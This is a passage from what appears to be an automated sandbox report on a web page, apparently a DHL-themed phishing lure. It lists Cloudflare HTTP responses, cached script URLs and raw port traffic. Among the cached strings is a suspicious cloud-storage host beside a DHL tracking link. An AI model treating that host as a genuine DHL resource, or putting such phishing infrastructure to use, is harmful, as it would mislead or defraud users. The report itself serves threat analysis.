cfL4;desc="?proto=TCP&rtt=2816&min_rtt=1642&rtt_var=1454&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2043&delivery_rate=1778319&cwnd=79&unsent_bytes=0&cid=ef5db0c68591ce90&ts=310&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Duv1BwLpCNN3uAFWCurn7MwA2C1W8o32BBXZvjj7cAXkZfyYseOI9k9eurGsKvGjJ4iKFJbsVSPEw1YHg9PFi%2FnZG0EjSsNwSYNUXjPNHIUR%2FPxx0zf6fQaTAnPyO%2BCYjoygxhSRvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa53378795241f2-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2290&min_rtt=1803&rtt_var=1024&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2051&delivery_rate=1619523&cwnd=231&unsent_bytes=0&cid=c9da5f161fac6eea&ts=254&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KuAvvPWCC3V1DtO1TqEH4BLOMPgVc1u9kVU2ZQstScYGGvYAIvLe5sNOrBv3k6zBeem0YtXFyjis9yRjHAP8VYmtwzaswD37HnTEoxH9iicLR0aGACl17v9GIy%2FYbJFvnS81u%2BHMFA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa53378de974393-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1583&min_rtt=1570&rtt_var=615&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2035&delivery_rate=1742243&cwnd=201&unsent_bytes=0&cid=9d33f36926953eeb&ts=270&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:40 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=snEQ7C1MbvXUmZAnZ920AUtLoh7aNy0%2BRZZV8QrkbBfdXzvMF33kJR4%2FqQx8K3W02q8xtHNdAy2%2FDvUmz%2FcBtqkOaktDQSg2w1j5lBVxS6QPUPGRTRibfq7G3yw8iWzFLB%2FupM2U7g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa53378dd207c6f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2033&min_rtt=1984&rtt_var=779&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2043&delivery_rate=1471774&cwnd=212&unsent_bytes=0&cid=258df5e19d7a6de8&ts=271&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5a5VAQcZrHeoDD0oC4NdO3CFh%2FiTfSdd9X6n6lXIb4WA5Ir1ET05fmAGrKaT7IUsgtR%2Fdw5zBD8LWzKQ0donG%2FJtJV2fuChxCoYBRBlG73U0B6NyomsH%2FkyPvhBQgiS4qUbwoc3tTA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533793b884225-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1741&min_rtt=1739&rtt_var=657&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2048&delivery_rate=1660978&cwnd=235&unsent_bytes=0&cid=289f69bbfbb3a6dc&ts=970&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:41 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gFK%2FgB0h0LUMAdVNc3XSlAjWF%2BXUm0YX%2FIciv3hEKoB%2FOlsYtcCRUYsxBlc%2Be%2FK5Oz4XjGWxp8Wt1bM%2BlhYRKmlE89ekgeVTPJbGTdA7L6B5A1C4Zh5jFq8%2Ftf2Neyh3L58H73m4Pg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533794e3b4259-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1738&min_rtt=1735&rtt_var=658&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2055&delivery_rate=1654390&cwnd=233&unsent_bytes=0&cid=171a511449310c96&ts=1120&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fpg6trqY0mnRoc10Hn5NT%2BK%2BQDk1SMIEtTBCCfQFwh9%2BuXZetbSsOKFIAaIYERUt%2FO7QznzmCYpgaOtoYU9ou97h3KFwYL0wyE5%2BBxa29JcnRisEduJbA9wh%2FlBhVAfJTx%2BgG12Edw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa5337d0fff0f74-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1598&min_rtt=1597&rtt_var=601&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2040&delivery_rate=1819314&cwnd=151&unsent_bytes=0&cid=84fa2aaf619d3102&ts=1450&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:42 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MI4%2FjELcY5dYeJwDoxmxvqWGiPWgeXoaacurmA9L%2FRsRWRXMmqAZ0IIpBnpOCtOsh8donJNSJVhcSx8giJg8CTGBcmvMCNRSN96%2Fc3X5p346aaxjhGvZkAAYKRdqyBhhoMiJunorzA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa5337d9fd87d02-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2010&min_rtt=2005&rtt_var=763&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2039&delivery_rate=1425085&cwnd=230&unsent_bytes=0&cid=bc73a420b61b1c11&ts=1408&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=i4%2F8XNL8MPan3v5g0SVlyEZ3zd2ipNJBcW3HonMrfIxODDM0DYQISFLUFaqhjwer%2BX5WBnN87m5G%2Bc1%2FYXh90%2FKr4WiyC9gFY17ZRhHSt0716T2W0tkn1re2Wi1SEMBM%2Bbj6IqBeYw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa5337d9da04288-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1727&min_rtt=1722&rtt_var=656&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2048&delivery_rate=1655328&cwnd=245&unsent_bytes=0&cid=d730fcde0e8e5811&ts=2120&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jHn3n4beRB%2BSS94gssuptuL7nOn0MEuYlYPVFT5ZXBD%2BNqrCkYhE2A35wih7ipzu%2FFq79ExV5iTWC1RE3IAnBB4aZCzlqwdwTT6ots1QDD2nzXWr34Gfgf%2BrBze6PSJvapS2wao7Hg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533831ad68c39-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2015&min_rtt=2005&rtt_var=773&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=2047&delivery_rate=1396461&cwnd=190&unsent_bytes=0&cid=7dc13e987707ea6b&ts=1485&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:43 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTAF%2FTHgKJNl5i75AJWWUtfdQadA3SIFZQsPvwj6klKwS8kwDj7h%2Fyj3JQbP0LtubMKgpTKu6uou3CZS%2FGk%2BBD1xwZBAddp6xnj8IpfNTJLCfCEBQFVxm2tnW8q%2Bf%2FIO%2Fdogfzzy9g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533831edd4309-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1593&min_rtt=1584&rtt_var=612&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2037&delivery_rate=1760096&cwnd=234&unsent_bytes=0&cid=4729e1685d4ee1dd&ts=1545&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:42:44 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iCmgp3u2ZYkc3j9OOSjae9%2FTZ8HzIU%2FuIj%2Fl%2BqTPfhWNs9c6tOZqYxJQJ5vmx5Xw%2BKmkkJzkZQM6rB%2BeazGeVwCK3HozSlI8HqYJ9VeMVs4vk%2FoTV1rDA%2FWNFfxbhI6UtOaerRDKKg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa53388ed7c439d-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=8794&min_rtt=1792&rtt_var=4994&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=2045&delivery_rate=1629464&cwnd=201&unsent_bytes=0&cid=5963385999193e47&ts=1734&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:44 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XfqDZSsVCwM7jz8Znt7fjGJKX6U9ltdpYVchgnYPFyR63s%2FEH2t75AFuIpXIpVqWqL4hRwV8LSVoF%2BdMcJjIhfWaOVrrfQLartkHEbcR6ZIXzvk9oxB9YuSIgXgdQnr2yPBmYCVN6g%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa533894de90f98-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1495&min_rtt=1481&rtt_var=584&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2052&delivery_rate=1830721&cwnd=182&unsent_bytes=0&cid=c697cf2b72d04a70&ts=1705&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 30 Dec 2024 21:42:45 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400CF-Cache-Status: EXPIREDReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5eLhL%2F5%2BVSnrVVzS69WUF1U90W5XPCWdl7RvBnuvNW262JtmCBhzqGxVmU8e84cKMnyxMzKh7nj6ED01o7uKOm0VkM2rwnZ%2B0EDc796cdT%2FQml0f1sLw81e3WYXDvhLhBySs0EzssA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8fa5338c1a928c5f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=2051&min_rtt=2047&rtt_var=776&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=2060&delivery_rate=1403171&cwnd=171&unsent_bytes=0&cid=8ab81dd96b43e977&ts=1460&x=0"
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:42:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:43:07 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Mon, 30 Dec 2024 21:43:19 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeAccept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACritical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UACross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originOrigin-Agent-Cluster: ?1Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Content-Options: nosniffX-Frame-Options: SAMEORIGINcf-mitigated: challenge
          Source: chromecache_102.2.dr, chromecache_106.2.drString found in binary or memory: http://opensource.org/licenses/MIT).
          Source: chromecache_68.2.drString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
          Source: chromecache_68.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js
          Source: chromecache_68.2.drString found in binary or memory: https://code.jquery.com/jquery-3.2.1.slim.min.js
          Source: chromecache_68.2.drString found in binary or memory: https://eyjhbgcioijiuzi1niisinr5cci6ikpxvcj9eyj1c2vdxtrdttgyypppkkj8hii.s3-web.eu-gb.cloud-object-st
          Source: chromecache_84.2.dr, chromecache_112.2.drString found in binary or memory: https://getbootstrap.com)
          Source: chromecache_82.2.dr, chromecache_64.2.drString found in binary or memory: https://getbootstrap.com/)
          Source: chromecache_84.2.dr, chromecache_82.2.dr, chromecache_112.2.dr, chromecache_64.2.drString found in binary or memory: https://github.com/twbs/bootstrap/blob/master/LICENSE)
          Source: chromecache_84.2.dr, chromecache_82.2.dr, chromecache_112.2.dr, chromecache_64.2.drString found in binary or memory: https://github.com/twbs/bootstrap/graphs/contributors)
          Source: chromecache_68.2.drString found in binary or memory: https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js
          Source: chromecache_68.2.drString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js
          Source: chromecache_68.2.drString found in binary or memory: https://www.dhl.com/content/g0/en/express/tracking.shtml?AWB=4003526800&brand=DHL
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 58484 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58618
          Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58532 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58500
          Source: unknownNetwork traffic detected: HTTP traffic on port 58498 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 58490 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 58529 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58521 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58517 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58509
          Source: unknownNetwork traffic detected: HTTP traffic on port 58489 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58500 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58505
          Source: unknownNetwork traffic detected: HTTP traffic on port 58481 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58508
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58507
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58502
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58501
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58504
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58503
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58511
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58510
          Source: unknownNetwork traffic detected: HTTP traffic on port 58495 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58503 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58524 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58520 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58486 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58518 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58501 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58517
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58516
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58519
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58518
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58513
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58634
          Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58479
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58512
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58514
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58635
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58487
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58520
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58486
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58640
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58489
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58522
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58643
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58488
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58521
          Source: unknownNetwork traffic detected: HTTP traffic on port 58534 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58642
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58483
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58482
          Source: unknownNetwork traffic detected: HTTP traffic on port 58504 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58485
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58484
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58481
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58480
          Source: unknownNetwork traffic detected: HTTP traffic on port 58492 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58653 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58483 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 58523 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58528
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58649
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58527
          Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58529
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 58524
